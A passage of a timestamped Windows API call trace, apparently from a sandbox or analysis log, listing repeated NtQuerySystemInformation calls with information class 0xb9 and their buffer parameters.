Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x28, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd770, Length=0x28, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x28, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x28, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x20, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x20, ResultLength=0x0) [0271.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x20, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x20, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x20, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x20, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc48, Length=0x50, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda10, Length=0x28, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0271.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x20, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd970, Length=0x20, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd970, Length=0x20, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd970, Length=0x20, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x20, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x50, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0271.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0271.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] 